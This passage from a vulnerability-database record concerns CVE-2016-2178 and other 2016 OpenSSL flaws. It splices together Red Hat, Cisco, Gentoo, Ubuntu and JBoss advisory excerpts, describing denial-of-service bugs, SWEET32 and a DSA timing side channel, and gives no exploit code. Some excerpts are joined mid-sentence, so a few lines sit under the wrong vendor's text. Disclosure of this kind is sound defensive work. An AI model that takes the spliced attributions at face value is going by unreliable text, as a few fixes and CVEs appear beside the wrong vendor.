Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that OpenSSL did not always use constant time\noperations when computing Digital Signature Algorithm (DSA) signatures. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. \n(CVE-2016-2179)\n\n* A flaw was found in the Datagram TLS (DTLS) replay protection\nimplementation in OpenSSL. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. An attacker able to make an application using OpenSSL to process\na large BIGNUM could cause the application to crash or, possibly, execute\narbitrary code. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. A remote attacker could use this\nflaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for\nsession tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. (CVE-2016-2180)\n\n* Multiple out of bounds read flaws were found in the way OpenSSL handled\ncertain TLS/SSL protocol handshake messages. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. Upstream\nacknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter\nof CVE-2016-6304 and CVE-2016-6306; and Karthikeyan Bhargavan (Inria) and\nGaA\u003c\u003ctan Leurent (Inria) as the original reporters of CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Of these 14 vulnerabilities, the OpenSSL Software Foundation classifies one as aCritical Severity,a one as aModerate Severity,a and the other 12 as aLow Severity.a\n\nSubsequently, on September 26, the OpenSSL Software Foundation released an additional advisory that describes two new vulnerabilities. One of the new vulnerabilities was rated as aHigh Severitya and the other as aModerate Severity.a\n\nOf the 16 released vulnerabilities:\n Fourteen track issues that could result in a denial of service (DoS) condition\n One (CVE-2016-2183, aka SWEET32) tracks an implementation of a Birthday attack against Transport Layer Security (TLS) block ciphers that use a 64-bit block size that could result in loss of confidentiality\n One (CVE-2016-2178) is a timing side-channel attack that, in specific circumstances, could allow an attacker to derive the private DSA key that belongs to another user or service running on the same system\n\nFive of the 16 vulnerabilities affect exclusively the recently released OpenSSL versions that belong to the 1.1.0 code train, which has not yet been integrated into any Cisco product. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. Description:\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server. \n\nThis release includes bug fixes as well as a new release of OpenSSL. For\nfurther information, see the knowledge base article linked to in the\nReferences section. The JBoss server process must be restarted for the update\nto take effect. After installing the updated\npackages, the httpd daemon will be restarted automatically. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6", "sources": [ { "db": "NVD", "id": "CVE-2016-2178" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "BID", "id": "91081" }, { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138889" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "140182" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2178", "trust": 3.0 }, { "db": "BID", "id": "91081", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/6", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/7", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/5", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/09/8", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/2", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/12", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/8", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/11", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/09/2", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/10", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/4", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036054", "trust": 1.1 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-003305", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2178", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143176", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138889", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "BID", "id": "91081" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138889" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "id": "VAR-201606-0477", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", 